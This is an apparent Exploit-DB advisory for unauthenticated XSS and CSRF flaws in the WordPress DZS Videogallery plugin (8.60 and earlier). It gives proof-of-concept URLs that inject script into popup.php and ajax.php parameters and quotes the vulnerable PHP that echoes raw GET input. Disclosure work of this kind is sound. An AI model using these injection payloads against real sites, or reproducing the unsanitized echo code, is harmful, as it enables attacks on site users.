Wordpress DZS Videogallery Plugin - Multiple Vulnerabilities

vendor:

DZS Videogallery Plugin

by:

Colette Chamberland (Wordfence)

8,8

CVSS

HIGH

Unauthenticated CSRF & XSS

CWE

Product Name: DZS Videogallery Plugin

Affected Version From: <=8.60

Affected Version To: <=8.60

Patch Exists: YES

Related CWE: OVE-20160305-2497

CPE: a:digitalzoomstudio:dzs_videogallery

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Wordpress 4.2.x-4.4.x

2016

WordPress DZS Videogallery Plugin – Multiple Vulnerabilities <=8.60

The DZS Videogallery Plugin for Wordpress contains multiple vulnerabilities that allow an unauthenticated attacker to perform Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) attacks. The vulnerabilities exist due to the lack of proper sanitization of user-supplied input in the 'initer' and 'width' parameters of the 'popup.php' and 'ajax.php' scripts, respectively. An attacker can exploit these vulnerabilities by enticing an authenticated user to follow a malicious link or visit a malicious page.

Mitigation:

The vendor has released an update to address these vulnerabilities. Users are advised to update to the latest version of the plugin.

Source

Exploit-DB raw data:

* Exploit Title: Wordpress DZS Videogallery Plugin - Multiple Vulnerabilities <=8.60
* Discovery Date: 01.05.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://digitalzoomstudio.net/
* Software Link: http://codecanyon.net/item/video-gallery-wordpress-plugin-w-youtube-vimeo-/157782
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: <=8.60
* Tested on: Wordpress 4.2.x-4.4.x
* OVE-20160305-2497


Technical details:

Unauthenticated CSRF & XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/playlistseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645
Line 13-15 (unsanitized input):
 if(isset($_GET['initer'])){
            $initer = $_GET['initer'];
        }
Line 27 (unsanitized output):
       <?php echo "var initer = '" . $initer . "';"; ?>
---------------------------------------       
Unauthenticated CSRF &  XSS
POC:
http://[target]/wp-content/plugins/dzs-videogallery/admin/tagseditor/popup.php?initer=whatava18642%27%3balert%281%29%2f%2f645

Line 13-15 (unsanitized input):
 if(isset($_GET['initer'])){
            $initer = $_GET['initer'];
        }
Line 27 (unsanitized output):
       <?php echo "var initer = '" . $initer . "';"; ?>
--------------------------------------- 
Unauthenticated CSRF & XSS:
POC(s):
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=6d27f"><script>alert(1)<%2fscript>894ba&type=&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=7934f"><script>alert(1)<%2fscript>99085&width=
http://[target]/wp-content/plugins/dzs-videogallery/ajax.php?height=&source=&type=&width=54fd7"><script>alert(1)<%2fscript>4708b

Line 25 & 35 (unsanitized input & direct output):
$w =  $_GET['width'];
<param name="flashvars" value="video=' . $_GET['source'] . '&types=' . $_GET['type'] . '&defaultQuality=hd" width="' . $w . '" height="' . $h . '">'.$backup.'